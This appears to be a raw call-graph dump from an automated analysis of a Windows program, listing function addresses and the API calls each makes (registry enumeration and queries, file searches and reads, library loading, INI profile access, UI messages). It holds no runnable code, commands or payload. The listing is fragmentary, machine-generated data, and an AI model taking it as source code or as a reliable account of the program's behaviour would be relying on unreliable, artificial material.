7068->7069 7068->7079 7070 411ac1 7069->7070 7071 40be4e 3 API calls 7070->7071 7072 411ad3 7071->7072 7073 40beec 5 API calls 7072->7073 7074 411ae2 memcpy 7073->7074 7075 411b00 7074->7075 7076 40be4e 3 API calls 7075->7076 7077 411b11 7076->7077 7078 40beec 5 API calls 7077->7078 7078->7079 7079->7029 7081 40be65 7080->7081 7082 40be85 memcpy 7081->7082 7083 40be8c memcpy 7081->7083 7086 40bea3 7081->7086 7082->7046 7083->7086 7085 40beb2 memcpy 7085->7086 7086->7082 7086->7085 7088 40bf06 memset 7087->7088 7089 40bf2c memset 7087->7089 7094 40bf6b 7088->7094 7091 40bf3b 7089->7091 7093 40bf51 memcpy memset 7091->7093 7092 40bf1c memset 7092->7091 7093->7048 7094->7092 7096 412360 7095->7096 7097 40dd66 RegOpenKeyExA 7096->7097 7098 40debc 7097->7098 7099 40dd8d memset 7097->7099 7098->6672 7100 40dea2 RegEnumKeyA 7099->7100 7101 40deb3 RegCloseKey 7100->7101 7102 40ddba RegOpenKeyExA 7100->7102 7101->7098 7103 40de05 7102->7103 7104 40ddd8 RegQueryValueExA 7102->7104 7103->7100 7105 40de8b RegCloseKey 7103->7105 7106 4060da 2 API calls 7103->7106 7104->7103 7104->7105 7105->7103 7107 40de5b WideCharToMultiByte 7106->7107 7108 40de80 LocalFree 7107->7108 7108->7105 7110 406780 strcat 7109->7110 7111 40678e 7109->7111 7110->7111 7112 4112ec 7111->7112 7129 406fd2 7112->7129 7115 411327 7116 41134e 7115->7116 7117 411332 7115->7117 7137 40702d 7115->7137 7118 406fd2 9 API calls 7116->7118 7154 411270 7117->7154 7120 41137a 7118->7120 7121 40702d 9 API calls 7120->7121 7122 4113a8 7120->7122 7127 4112ec 65 API calls 7120->7127 7147 406f97 7120->7147 7121->7120 7151 4070c5 7122->7151 7126 4070c5 FindClose 7128 4113be 7126->7128 7127->7120 7128->6694 7130 4070c5 FindClose 7129->7130 7131 406fdf 7130->7131 7132 4060da 2 API calls 7131->7132 7133 406ff2 strlen strlen 7132->7133 7134 407016 7133->7134 7136 40701f 7133->7136 7135 4062b7 4 API calls 7134->7135 7135->7136 7136->7115 7138 407038 FindFirstFileA 7137->7138 7139 407059 FindNextFileA 7137->7139 7142 407074 7138->7142 7140 40707b strlen strlen 7139->7140 7141 40706f 7139->7141 7144 4070b4 7140->7144 7145 4070ab 7140->7145 7143 4070c5 FindClose 7141->7143 7142->7140 7142->7144 7143->7142 7144->7115 7146 4062b7 4 API calls 7145->7146 7146->7144 7148 406fa1 strcmp 7147->7148 7149 406fc9 7147->7149 7148->7149 7150 406fb8 strcmp 7148->7150 7149->7120 7150->7149 7152 4070d8 7151->7152 7153 4070ce FindClose 7151->7153 7152->7126 7153->7152 7165 405ed5 CreateFileA 7154->7165 7156 41127b 7157 411284 GetFileSize 7156->7157 7158 4112e8 7156->7158 7159 411297 ??2@YAPAXI SetFilePointer 7157->7159 7160 4112dd CloseHandle 7157->7160 7158->7115 7166 406725 ReadFile 7159->7166 7160->7158 7162 4112be 7167 411133 7162->7167 7165->7156 7166->7162 7168 412360 7167->7168 7169 411140 wcslen ??2@YAPAXI WideCharToMultiByte 7168->7169 7182 4104ae 7169->7182 7171 411179 7172 411199 strlen 7171->7172 7194 41061f 7172->7194 7174 4111b9 memcpy 7197 41072a 7174->7197 7176 411217 ??3@YAXPAX 7207 410596 7176->7207 7178 4060da 2 API calls 7178->7176 7225 406578 memset 7182->7225 7184 4104c1 ??2@YAPAXI 7185 4104d0 7184->7185 7186 4104d9 ??2@YAPAXI 7185->7186 7187 4104eb 7186->7187 7188 4104f4 ??2@YAPAXI 7187->7188 7189 41050b ??2@YAPAXI 7188->7189 7191 41052f ??2@YAPAXI 7189->7191 7193 410553 7191->7193 7193->7171 7195 410634 ??2@YAPAXI 7194->7195 7196 410629 ??3@YAXPAX 7194->7196 7195->7174 7196->7195 7226 406a7d free free 7197->7226 7199 41075c 7227 406a7d free free 7199->7227 7201 410a3f 7201->7176 7201->7178 7202 406b54 4 API calls 7205 410767 7202->7205 7203 41064b 19 API calls 7203->7205 7204 4108c0 memcpy 7204->7205 7205->7201 7205->7202 7205->7203 7205->7204 7228 40feb1 7205->7228 7208 4105a3 ??3@YAXPAX 7207->7208 7209 4105ae 7207->7209 7208->7209 7210 4105c5 7209->7210 7211 406b8a free 7209->7211 7212 406b8a free 7210->7212 7214 4105db 7210->7214 7215 4105be ??3@YAXPAX 7211->7215 7216 4105d4 ??3@YAXPAX 7212->7216 7213 4105f1 7218 410607 7213->7218 7237 406a7d free free 7213->7237 7214->7213 7217 406b8a free 7214->7217 7215->7210 7216->7214 7219 4105ea ??3@YAXPAX 7217->7219 7221 41061d ??3@YAXPAX 7218->7221 7238 406a7d free free 7218->7238 7219->7213 7221->7160 7222 410600 ??3@YAXPAX 7222->7218 7224 410616 ??3@YAXPAX 7224->7221 7225->7184 7226->7199 7227->7205 7229 4102a6 7228->7229 7230 41048d 7228->7230 7229->7230 7231 4102cc strlen strncmp 7229->7231 7232 410409 strlen strncmp 7229->7232 7233 4103dc memcpy 7229->7233 7235 410354 memcpy atoi WideCharToMultiByte 7229->7235 7230->7205 7231->7229 7232->7229 7236 406541 strtoul 7233->7236 7235->7229 7236->7229 7237->7222 7238->7224 7239->6711 7240->6711 7242 402661 memset 7241->7242 7256 40f1f1 RegQueryValueExA 7242->7256 7244 40268a 7244->7242 7245 402197 memset 7244->7245 7246 402785 RegCloseKey 7244->7246 7247 4026a0 strcpy 7245->7247 7246->6711 7257 40f1f1 RegQueryValueExA 7247->7257 7249 40f1f1 RegQueryValueExA 7251 4026d9 7249->7251 7250 40f1ca RegQueryValueExA 7250->7251 7251->7249 7251->7250 7258 40242b 7251->7258 7253 40275a strcpy 7254 4023c6 16 API calls 7253->7254 7254->7244 7255->6711 7256->7244 7257->7251 7270 40f214 RegQueryValueExA 7258->7270 7260 40245f 7261 402491 7260->7261 7264 402558 7260->7264 7269 40250a 7260->7269 7262 4024f3 7261->7262 7263 40249e memset 7261->7263 7261->7269 7266 40eff9 5 API calls 7262->7266 7271 40eff9 7263->7271 7268 402592 WideCharToMultiByte LocalFree 7264->7268 7264->7269 7266->7269 7268->7269 7269->7253 7270->7260 7272 40f011 UuidFromStringA 7271->7272 7273 40f025 UuidFromStringA 7271->7273 7274 40f037 UuidFromStringA 7272->7274 7273->7274 7275 40f03d 7274->7275 7276 4024db WideCharToMultiByte 7274->7276 7275->7276 7277 40f070 memcpy CoTaskMemFree 7275->7277 7276->7269 7277->7276 7278->6719 7279->6719 7289 40f276 RegEnumKeyExA 7280->7289 7282 402ad6 RegCloseKey 7282->6719 7284 402a91 7284->7282 7287 402ad5 7284->7287 7290 40f1b0 RegOpenKeyExA 7284->7290 7291 4029d5 memset 7284->7291 7299 40f276 RegEnumKeyExA 7284->7299 7287->7282 7288->6719 7289->7284 7290->7284 7300 40f276 RegEnumKeyExA 7291->7300 7293 402a54 RegCloseKey 7293->7284 7298 402a09 7298->7293 7301 40f1b0 RegOpenKeyExA 7298->7301 7302 40278f 7298->7302 7316 40f276 RegEnumKeyExA 7298->7316 7299->7284 7300->7298 7301->7298 7303 40282b memset 7302->7303 7317 402963 RegQueryValueExA 7303->7317 7305 402853 7305->7303 7306 402197 memset 7305->7306 7307 402959 RegCloseKey 7305->7307 7308 402866 strcpy 7306->7308 7307->7298 7309 402963 4 API calls 7308->7309 7312 4028a2 7309->7312 7310 402963 RegQueryValueExA WideCharToMultiByte strlen memcpy 7310->7312 7311 40f1ca RegQueryValueExA 7311->7312 7312->7310 7312->7311 7313 40242b 10 API calls 7312->7313 7314 40292e strcpy 7313->7314 7315 4023c6 16 API calls 7314->7315 7315->7305 7316->7298 7318 40299e 7317->7318 7322 4029b3 7317->7322 7319 4029b8 WideCharToMultiByte 7318->7319 7320 4029aa 7318->7320 7319->7322 7321 4060da 2 API calls 7320->7321 7321->7322 7322->7305 7323->6733 7360 406c5e 7324->7360 7326 40d7da 7327 40d9ca 7326->7327 7328 404638 free 7326->7328 7327->6733 7329 40d7ed 7328->7329 7371 406209 strcpy strrchr 7329->7371 7334 40d818 strlen strlen 7336 40d852 7334->7336 7337 40d83b 7334->7337 7335 40d85d memset strlen strlen 7338 40d8b0 memset strlen strlen 7335->7338 7339 40d899 7335->7339 7336->7335 7340 4062b7 4 API calls 7337->7340 7343 40d90e 7338->7343 7344 40d8f7 7338->7344 7341 4062b7 4 API calls 7339->7341 7340->7336 7341->7338 7346 40d936 7343->7346 7347 406c5e 9 API calls 7343->7347 7345 4062b7 4 API calls 7344->7345 7345->7343 7392 406155 GetFileAttributesA 7346->7392 7349 40d92d 7347->7349 7349->7346 7383 40c656 memset 7349->7383 7350 40d942 7351 40d954 7350->7351 7393 40d3b5 7350->7393 7419 406155 GetFileAttributesA 7351->7419 7355 40d960 7358 40d972 7355->7358 7420 40d003 7355->7420 7357 40d989 _stricmp 7357->7358 7358->7327 7358->7357 7359 40d9aa strcpy 7358->7359 7359->7358 7466 405ed5 CreateFileA 7360->7466 7362 406c6b 7363 406c73 GetFileSize 7362->7363 7364 406caf 7362->7364 7365 406b8a free 7363->7365 7364->7326 7366 406c84 7365->7366 7367 406b54 4 API calls 7366->7367 7368 406c8d 7367->7368 7467 406725 ReadFile 7368->7467 7370 406c96 CloseHandle 7370->7364 7372 406222 7371->7372 7373 40c70b memset memset memset 7372->7373 7374 40c767 7373->7374 7468 40692f 7374->7468 7376 40c8c7 7376->7334 7376->7335 7377 40692f memcpy 7379 40c77f 7377->7379 7378 406a01 strlen strlen _memicmp 7378->7379 7379->7376 7379->7377 7379->7378 7380 40c80f memcpy 7379->7380 7381 40c852 memcpy 7379->7381 7382 40c878 memcpy 7380->7382 7381->7382 7382->7379 7385 40c689 7383->7385 7384 40692f memcpy 7384->7385 7385->7384 7386 40c695 _stricmp 7385->7386 7387 40c6ef 7385->7387 7389 406aa3 7 API calls 7385->7389 7472 406a7d free free 7385->7472 7386->7385 7473 406a7d free free 7387->7473 7389->7385 7390 40c707 7390->7346 7392->7350 7394 40d3c2 7393->7394 7474 40e54c memset 7394->7474 7396 40d7ba 7396->7351 7399 40e6b4 SetCurrentDirectoryA 7399->7396 7401 40d419 memset memset MultiByteToWideChar WideCharToMultiByte 7417 40d48a 7401->7417 7402 40d4df memset memset 7402->7417 7403 40d789 7403->7399 7404 40d56e strcpy 7404->7417 7405 40d581 strcpy 7405->7417 7406 40d595 strcpy 7406->7417 7407 40d5ab strcpy 7407->7417 7408 40d5c1 strcpy 7408->7417 7409 40d5d7 strcpy 7410 40d5e8 memset memset 7409->7410 7510 40cf02 7410->7510 7412 40cf02 3 API calls 7412->7417 7413 40d660 7 API calls 7414 40d6fb _stricmp 7413->7414 7415 40d72d _stricmp 7413->7415 7414->7415 7416 40d714 _stricmp 7414->7416 7415->7417 7416->7415 7416->7417 7417->7402 7417->7403 7417->7404 7417->7405 7417->7406 7417->7407 7417->7408 7417->7409 7417->7410 7417->7412 7417->7413 7418 4060da strlen memcpy 7417->7418 7418->7417 7419->7355 7421 40d010 7420->7421 7422 40e54c 28 API calls 7421->7422 7426 40d028 7422->7426 7423 40d3ae 7423->7358 7424 40d3a6 7425 40e6b4 SetCurrentDirectoryA 7424->7425 7425->7423 7426->7423 7426->7424 7569 411c05 7426->7569 7428 40d064 7579 411eb7 7428->7579 7432 40d37f 7433 404638 free 7432->7433 7434 40d393 7433->7434 7435 406b8a free 7434->7435 7436 40d39b 7435->7436 7606 406a7d free free 7436->7606 7437 40d079 7437->7432 7592 406cff MultiByteToWideChar 7437->7592 7440 411eb7 17 API calls 7464 40d0ac 7440->7464 7441 40d0b1 memset memset 7602 411c8a 7441->7602 7442 40d368 7443 404638 free 7442->7443 7445 40d370 7443->7445 7446 406b8a free 7445->7446 7447 40d378 7446->7447 7605 406a7d free free 7447->7605 7449 411c8a _mbsicmp 7454 40d0eb 7449->7454 7450 40d131 strcpy 7450->7454 7451 40d145 strcpy 7451->7454 7452 40d15b strcpy 7452->7454 7453 40d171 strcpy 7453->7454 7454->7449 7454->7450 7454->7451 7454->7452 7454->7453 7455 40d187 strcpy 7454->7455 7456 40d1ab memset memset 7454->7456 7457 40d19c strcpy 7454->7457 7455->7454 7458 40cf02 3 API calls 7456->7458 7457->7456 7458->7464 7459 40cf02 3 API calls 7459->7464 7460 40d223 7 API calls 7461 40d2f0 _stricmp 7460->7461 7462 40d2be _stricmp 7460->7462 7461->7464 7462->7461 7463 40d2d7 _stricmp 7462->7463 7463->7461 7463->7464 7464->7440 7464->7441 7464->7442 7464->7459 7464->7460 7465 4060da strlen memcpy 7464->7465 7465->7464 7466->7362 7467->7370 7469 406942 7468->7469 7470 406946 7468->7470 7469->7379 7470->7469 7471 406971 memcpy 7470->7471 7471->7469 7472->7385 7473->7390 7475 40e589 7474->7475 7476 40e57b 7474->7476 7478 40d3da 7475->7478 7479 40e597 GetCurrentDirectoryA SetCurrentDirectoryA memset strlen strlen 7475->7479 7477 4060da 2 API calls 7476->7477 7477->7475 7478->7396 7478->7403 7489 40fcbc 7478->7489 7480 40e5e8 7479->7480 7483 40e5ff GetModuleHandleA 7479->7483 7481 4062b7 4 API calls 7480->7481 7481->7483 7484 40e64d 7 API calls 7483->7484 7485 40e61d LoadLibraryExA 7483->7485 7484->7478 7485->7484 7486 40e635 7485->7486 7519 40e507 GetModuleHandleA GetModuleHandleA GetModuleHandleA 7486->7519 7490 40fcd2 memset 7489->7490 7501 40d411 7489->7501 7491 40fd05 7490->7491 7492 40fcf8 strcpy 7490->7492 7526 40faa6 memset memset 7491->7526 7493 40fd0a 7492->7493 7495 40fd16 memset strcpy strcat 7493->7495 7496 40fdea GetModuleHandleA 7493->7496 7552 406155 GetFileAttributesA 7495->7552 7497 40fe04 7496->7497 7498 40fdfd LoadLibraryA 7496->7498 7500 40fe12 9 API calls 7497->7500 7497->7501 7498->7497 7500->7501 7501->7401 7501->7403 7502 40fd5e 7503 40fd65 strcpy strcat 7502->7503 7504 40fd8c 7502->7504 7503->7504 7553 406155 GetFileAttributesA 7504->7553 7506 40fd98 7507 40fdc4 GetModuleHandleA 7506->7507 7508 40fd9d strcpy strcat 7506->7508 7507->7497 7509 40fdd8 LoadLibraryExA 7507->7509 7508->7507 7509->7497 7511 40cf22 7510->7511 7516 40cf33 7510->7516 7512 40cf26 7511->7512 7513 40cf3f memset 7511->7513 7514 40132a strlen 7512->7514 7515 40132a strlen 7513->7515 7514->7516 7517 40cf6b 7515->7517 7516->7417 7517->7516 7518 40cfd8 memcpy 7517->7518 7518->7516 7520 40e536 FreeLibrary 7519->7520 7521 40e539 7519->7521 7520->7521 7522 40e540 7521->7522 7523 40e53d FreeLibrary 7521->7523 7524 40e544 FreeLibrary 7522->7524 7525 40e547 LoadLibraryExA 7522->7525 7523->7522 7524->7525 7525->7478 7525->7484 7554 40f1b0 RegOpenKeyExA 7526->7554 7528 40fafc 7529 40fc57 strcpy 7528->7529 7530 40fb07 memset 7528->7530 7532 40fcaa 7529->7532 7533 40fc6a ExpandEnvironmentStringsA 7529->7533 7555 40f276 RegEnumKeyExA 7530->7555 7532->7493 7535 40fa2b 8 API calls 7533->7535 7534 40fb32 7537 40fb3a _mbsnbicmp 7534->7537 7538 40fc4e RegCloseKey 7534->7538 7549 40fbec _mbsicmp 7534->7549 7556 40fa2b memset strlen strlen 7534->7556 7562 40f276 RegEnumKeyExA 7534->7562 7536 40fc7d 7535->7536 7536->7532 7563 40617c 7536->7563 7537->7534 7539 40fb58 memset memset _snprintf 7537->7539 7538->7529 7542 40f232 3 API calls 7539->7542 7544 40fbbd _mbsrchr 7542->7544 7544->7534 7545 40fa2b 8 API calls 7546 40fc92 7545->7546 7546->7532 7548 40fc9c GetCurrentDirectoryA 7546->7548 7550 40fa2b 8 API calls 7548->7550 7549->7534 7551 40fc05 strcpy strcpy 7549->7551 7550->7532 7551->7534 7552->7502 7553->7506 7554->7528 7555->7534 7557 40fa72 7556->7557 7558 40fa81 7556->7558 7559 4062b7 4 API calls 7557->7559 7567 406155 GetFileAttributesA 7558->7567 7559->7558 7561 40fa98 7561->7534 7562->7534 7568 40616a GetModuleFileNameA 7563->7568 7565 406182 strlen 7566 40618c 7565->7566 7566->7545 7567->7561 7568->7565 7607 405ed5 CreateFileA 7569->7607 7571 411c10 7572 411c69 7571->7572 7573 411c19 GetFileSize ??2@YAPAXI 7571->7573 7572->7428 7608 406725 ReadFile 7573->7608 7575 411c3b 7609 411c76 7575->7609 7578 411c62 ??3@YAXPAX 7578->7572 7580 404638 free 7579->7580 7581 411ec7 7580->7581 7612 406a7d free free 7581->7612 7583 411ece 7585 411f87 7583->7585 7587 40d06f 7583->7587 7613 411d0b 7583->7613 7586 411d0b 14 API calls 7585->7586 7586->7587 7588 411cb0 7587->7588 7589 411cbd 7588->7589 7591 411cff 7588->7591 7590 411ce6 _mbsicmp 7589->7590 7589->7591 7590->7589 7590->7591 7591->7437 7593 406d84 7592->7593 7594 406d28 7592->7594 7593->7464 7595 406b54 4 API calls 7594->7595 7596 406d46 MultiByteToWideChar 7595->7596 7598 406d64 7596->7598 7599 406d7a 7596->7599 7671 406cb6 WideCharToMultiByte 7598->7671 7600 406b8a free 7599->7600 7600->7593 7603 411cb0 _mbsicmp 7602->7603 7604 411c93 7603->7604 7604->7454 7605->7432 7606->7424 7607->7571 7608->7575 7610 406cff 9 API calls 7609->7610 7611 411c55 CloseHandle 7610->7611 7611->7572 7611->7578 7612->7583 7614 411d3c 7613->7614 7647 406baf 7614->7647 7616 411ea8 7617 406b8a free 7616->7617 7618 411eb0 7617->7618 7618->7583 7620 406baf 6 API calls 7621 411dd6 7620->7621 7622 406baf 6 API calls 7621->7622 7623 411df7 7622->7623 7637 411e22 7623->7637 7655 406d8d 7623->7655 7625 406d8d 2 API calls 7628 411e40 7625->7628 7627 406aa3 7 API calls 7630 411e6a 7627->7630 7631 406bf3 strlen 7628->7631 7635 406aa3 7 API calls 7630->7635 7633 411e48 7631->7633 7632 411e16 7634 406d8d 2 API calls 7632->7634 7636 406d8d 2 API calls 7633->7636 7634->7637 7638 411e7e 7635->7638 7640 411e54 7636->7640 7637->7625 7637->7640 7665 411fa3 7638->7665 7640->7627 7642 406b8a free 7643 411e98 7642->7643 7644 406b8a free 7643->7644 7645 411ea0 7644->7645 7646 406b8a free 7645->7646 7646->7616 7648 406bb9 7647->7648 7653 406be6 7647->7653 7649 406bca 7648->7649 7650 406bbe strlen 7648->7650 7651 406b54 4 API calls 7649->7651 7650->7649 7652 406bd3 7651->7652 7652->7653 7654 406bd7 memcpy 7652->7654 7653->7616 7653->7620 7654->7653 7656 406bf3 strlen 7655->7656 7658 406d9d 7656->7658 7657 406dea 7660 406bf3 7657->7660 7658->7657 7659 406dbe memmove 7658->7659 7659->7657 7661 406bf9 7660->7661 7662 406bfd 7660->7662 7661->7632 7663 406c03 strlen 7662->7663 7664 406c0b 7662->7664 7663->7632 7664->7632 7666 411fae 7665->7666 7670 411e90 7665->7670 7667 411fc0 7666->7667 7668 411fb7 free 7666->7668 7669 406104 3 API calls 7667->7669 7668->7670 7669->7670 7670->7642 7672 406cf6 7671->7672 7673 406cd8 7671->7673 7672->7599 7674 406b54 4 API calls 7673->7674 7675 406ce2 WideCharToMultiByte 7674->7675 7675->7672 7701 404cc2 SendMessageA 7676->7701 7678 4087bc 7679 407a69 7678->7679 7680 407a72 7679->7680 7682 407a77 7679->7682 7702 4079e7 7680->7702 7683 407ada strcpy 7682->7683 7686 407aa7 7682->7686 7689 407bb3 sprintf 7682->7689 7705 407ef3 _itoa 7683->7705 7684 407b32 LoadStringA 7688 407b3c 7684->7688 7686->7684 7688->7689 7691 407b5d memcpy 7688->7691 7692 408d4b 7689->7692 7690 407afc strlen 7690->7686 7690->7688 7691->7689 7693 408d92 SendMessageA 7692->7693 7694 408d59 7692->7694 7696 408d8b 7693->7696 7694->7693 7695 408d5e 7694->7695 7713 404cc2 SendMessageA 7695->7713 7696->6511 7696->6512 7698 408d6f 7698->7696 7700 408d76 7698->7700 7700->7696 7714 404cd6 SendMessageA 7700->7714 7701->7678 7703 4079f0 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 7702->7703 7704 407a68 7702->7704 7703->7704 7704->7682 7708 407f4f 7705->7708 7707 407af5 7707->7686 7707->7690 7709 412360 7708->7709 7710 407f5c memset GetPrivateProfileStringA 7709->7710 7711 407fa5 strcpy 7710->7711 7712 407fbb 7710->7712 7711->7707 7712->7707 7713->7698 7714->7700 7716 401995 7715->7716 7718 401950 7715->7718 7784 407dd5 7716->7784 7719 4019be 7718->7719 7783 401808 DefWindowProcA 7718->7783 7719->6404 7722 408d4b 3 API calls 7721->7722 7723 40b4bc 7722->7723 7724 40a3e9 11 API calls 7723->7724 7725 40b4c1 TrackPopupMenu 7724->7725 7725->6411 7727 408d4b 3 API calls 7726->7727 7728 40a3fc 7727->7728 7793 4018b0 7728->7793 7730 40a41d 7731 40a431 7730->7731 7732 40a423 7730->7732 7734 4018b0 3 API calls 7731->7734 7801 4018f7 SendMessageA 7732->7801 7735 40a44a 7734->7735 7736 40a450 7735->7736 7737 40a45e 7735->7737 7738 4018f7 2 API calls 7736->7738 7739 408d4b 3 API calls 7737->7739 7738->7737 7740 40a46b 7739->7740 7741 4018b0 3 API calls 7740->7741 7742 40a490 7741->7742 7743 40a4a2 7742->7743 7744 40a496 7742->7744 7746 4018b0 3 API calls 7743->7746 7745 4018f7 2 API calls 7744->7745 7745->7743 7747 40a4be 7746->7747 7748 40a4d0 7747->7748 7749 40a4c4 7747->7749 7751 4018b0 3 API calls 7748->7751 7750 4018f7 2 API calls 7749->7750 7750->7748 7752 40a4e2 7751->7752 7753 4087b1 SendMessageA 7752->7753 7754 40a4ed 7753->7754 7755 4018b0 3 API calls 7754->7755 7756 40a4fd 7755->7756 7798 405fa5 7756->7798 7758 40a516 7759 405fa5 3 API calls 7758->7759 7760 40a52f 7759->7760 7761 405fa5 3 API calls 7760->7761 7762 40a548 7761->7762 7763 4087b1 SendMessageA 7762->7763 7764 40a556 7763->7764 7765 4018b0 3 API calls 7764->7765 7766 40a570 7765->7766 7767 4018b0 3 API calls 7766->7767 7768 40a58c 7767->7768 7769 40a592 7768->7769 7770 40a59e 7768->7770 7771 4018f7 2 API calls 7769->7771 7770->6411 7771->7770 7773 4087b1 SendMessageA 7772->7773 7774 409eff 7773->7774 7804 404c50 SendMessageA 7774->7804 7777 409f12 7778 409f66 7777->7778 7779 409f68 7777->7779 7810 408df1 7777->7810 7778->6395 7813 4087be 7779->7813 7782 4087be SendMessageA 7782->7778 7783->7719 7785 407de1 7784->7785 7786 407e12 7784->7786 7787 407df4 EnumChildWindows 7785->7787 7788 407dfc 7785->7788 7786->7718 7787->7788 7789 407e02 EnumChildWindows 7788->7789 7790 407e0a 7788->7790 7789->7790 7792 40658f GetWindowLongA SetWindowLongA 7790->7792 7792->7786 7794 4018ba GetMenu GetSubMenu 7793->7794 7795 4018de 7793->7795 7797 4018ed EnableMenuItem 7794->7797 7795->7797 7797->7730 7799 405fb0 GetMenu GetSubMenu CheckMenuItem 7798->7799 7800 405fad 7798->7800 7799->7758 7800->7799 7802 401919 SendMessageA 7801->7802 7802->7731 7805 404c72 7804->7805 7808 404c8a 7804->7808 7807 404c90 7805->7807 7805->7808 7816 4048e6 SendMessageA 7805->7816 7807->7808 7817 4049ca SendMessageA 7807->7817 7808->7777 7818 4048fe 7810->7818 7822 4048c0 SendMessageA 7813->7822 7815 4087d5 SendMessageA 7815->7782 7816->7805 7817->7808 7821 4049ca SendMessageA 7818->7821 7820 404917 7820->7777 7821->7820 7822->7815 5734 40f2d0 5737 40f0e3 5734->5737 5738 40f0f0 5737->5738 5739 40f137 memset GetPrivateProfileStringA 5738->5739 5740 40f0fe memset 5738->5740 5745 40680b strlen 5739->5745 5750 406792 5740->5750 5744 40f179 5746 40681f 5745->5746 5748 406821 5745->5748 5746->5744 5747 406868 5747->5744 5748->5747 5754 406541 strtoul 5748->5754 5751 4067a3 5750->5751 5752 4067fb WritePrivateProfileStringA 5750->5752 5751->5752 5753 4067aa sprintf memcpy 5751->5753 5752->5744 5753->5751 5753->5752 5754->5748 8165 410d67 strcmp 8166 410db9 strcmp 8165->8166 8167 410d89 8165->8167 8168 410dd0 8166->8168 8169 410de8 strcmp 8166->8169 8172 4060da 2 API calls 8167->8172 8175 4060da 2 API calls 8168->8175 8170 410e11 strcmp 8169->8170 8171 410df9 8169->8171 8173 410e22 8170->8173 8174 410e3a strcmp 8170->8174 8182 4060da 2 API calls 8171->8182 8176 410da3 8172->8176 8185 4060da 2 API calls 8173->8185 8177 410e63 strcmp 8174->8177 8178 410e4b 8174->8178 8179 410de7 8175->8179 8188 4060da 2 API calls 8176->8188 8180 410e74 8177->8180 8181 410e96 strcmp 8177->8181 8187 4060da 2 API calls 8178->8187 8179->8169 8192 4060da 2 API calls 8180->8192 8184 410ec9 strcmp 8181->8184 8194 410ea7 8181->8194 8183 410e10 8182->8183 8183->8170 8186 410efc strcmp 8184->8186 8195 410eda 8184->8195 8189 410e39 8185->8189 8191 410f2f strcmp 8186->8191 8196 410f0d 8186->8196 8190 410e62 8187->8190 8193 410db8 8188->8193 8189->8174 8190->8177 8198 410f40 8191->8198 8199 410f58 strcmp 8191->8199 8197 410e8b 8192->8197 8193->8166 8200 4060da 2 API calls 8194->8200 8203 4060da 2 API calls 8195->8203 8208 4060da 2 API calls 8196->8208 8197->8181 8245 410bce 8198->8245 8201 410f81 strcmp 8199->8201 8202 410f69 8199->8202 8204 410ebe 8200->8204 8206 410f92 8201->8206 8207 410faa strcmp 8201->8207 8215 410bce 16 API calls 8202->8215 8205 410ef1 8203->8205 8204->8184 8205->8186 8218 410bce 16 API calls 8206->8218 8211 410fd3 strcmp 8207->8211 8212 410fbb 8207->8212 8210 410f24 8208->8210 8210->8191 8213 410fe4 8211->8213 8214 410ffc strcmp 8211->8214 8221 410bce 16 API calls 8212->8221 8222 4060da 2 API calls 8213->8222 8216 41103d _stricmp 8214->8216 8217 41100d 8214->8217 8215->8201 8219 411054 8216->8219 8220 41106c _stricmp 8216->8220 8227 4060da 2 API calls 8217->8227 8218->8207 8267 406541 strtoul 8219->8267 8223 41107d _stricmp 8220->8223 8224 41109f 8220->8224 8221->8211 8225 410ffb 8222->8225 8223->8224 8226 41108e _stricmp 8223->8226 8268 406541 strtoul 8224->8268 8225->8214 8226->8224 8229 4110b7 _stricmp 8226->8229 8230 411027 8227->8230 8233 4110e0 _stricmp 8229->8233 8234 4110c8 8229->8234 8239 4060da 2 API calls 8230->8239 8231 411065 8231->8220 8235 4110f1 _stricmp 8233->8235 8236 411113 8233->8236 8269 406541 strtoul 8234->8269 8235->8236 8238 411102 _stricmp 8235->8238 8270 406541 strtoul 8236->8270 8237 4110b0 8237->8229 8238->8236 8241 411124 8238->8241 8242 41103c 8239->8242 8242->8216 8243 4110d9 8243->8233 8271 4046e1 strcpy 8245->8271 8247 410be6 8248 4047aa 3 API calls 8247->8248 8249 410beb 8248->8249 8250 410bf3 strlen ??2@YAPAXI 8249->8250 8251 410d56 8249->8251 8253 410c3b memset memset 8250->8253 8259 410c15 8250->8259 8252 4047fb FreeLibrary 8251->8252 8255 410d61 8252->8255 8254 410c84 8253->8254 8257 410c95 strcpy 8254->8257 8258 410ca3 8254->8258 8255->8199 8257->8258 8273 40f1b0 RegOpenKeyExA 8258->8273 8259->8253 8272 406541 strtoul 8259->8272 8261 410cb8 8262 410ce6 8261->8262 8274 40f214 RegQueryValueExA 8261->8274 8265 410d19 WideCharToMultiByte LocalFree 8262->8265 8266 410d4c ??3@YAXPAX 8262->8266 8264 410cda RegCloseKey 8264->8262 8265->8266 8266->8251 8267->8231 8268->8237 8269->8243 8270->8241 8271->8247 8272->8259 8273->8261 8274->8264 6349 40f37c FindResourceA 6350 40f395 SizeofResource 6349->6350 6353 40f3bf 6349->6353 6351 40f3a6 LoadResource 6350->6351 6350->6353 6352 40f3b4 LockResource 6351->6352 6351->6353 6352->6353 5755 40f402 EnumResourceNamesA 7823 40a88e 7858 407d23 7823->7858 7826 402393 29 API calls 7827 40aa7e 7826->7827 7828 40aac4 7827->7828 7864 40492f 7827->7864 7867 40a02e 7828->7867 7831 40aad1 LoadIconA ImageList_ReplaceIcon 7832 40aaf5 7831->7832 7833 40aafa 7831->7833 7877 409f9c 7832->7877 7835 407d23 13 API calls 7833->7835 7836 40ab02 _stricmp 7835->7836 7838 40ab4c 7836->7838 7839 40ab3c RegDeleteKeyA 7836->7839 7840 40b031 13 API calls 7838->7840 7839->7838 7841 40ab54 SetFocus 7840->7841 7842 40ab9b strlen strlen 7841->7842 7843 40ab7f 7841->7843 7845 40abd0 7842->7845 7846 40abbb 7842->7846 7844 40617c 2 API calls 7843->7844 7847 40ab84 GetFileAttributesA 7844->7847 7874 40a175 SendMessageA 7845->7874 7848 4062b7 4 API calls 7846->7848 7847->7842 7850 40ab8f GetTempPathA 7847->7850 7848->7845 7850->7842 7851 40abea 7852 40a175 2 API calls 7851->7852 7853 40ac01 RegisterWindowMessageA 7852->7853 7854 40a3e9 11 API calls 7853->7854 7855 40ac1b 7854->7855 7856 401e4a 41 API calls 7855->7856 7857 40ac2c SendMessageA SendMessageA 7856->7857 7882 407bbf 7858->7882 7861 407d3c sprintf 7884 407bce 7861->7884 7863 407d5c 6 API calls 7863->7826 7865 404955 SendMessageA 7864->7865 7866 40494b strlen 7864->7866 7865->7827 7866->7865 7868 40a051 ImageList_Create ImageList_SetImageCount SendMessageA 7867->7868 7869 40a07d 7867->7869 7868->7869 7870 40a0b2 10 API calls 7869->7870 7871 40a086 ImageList_Create 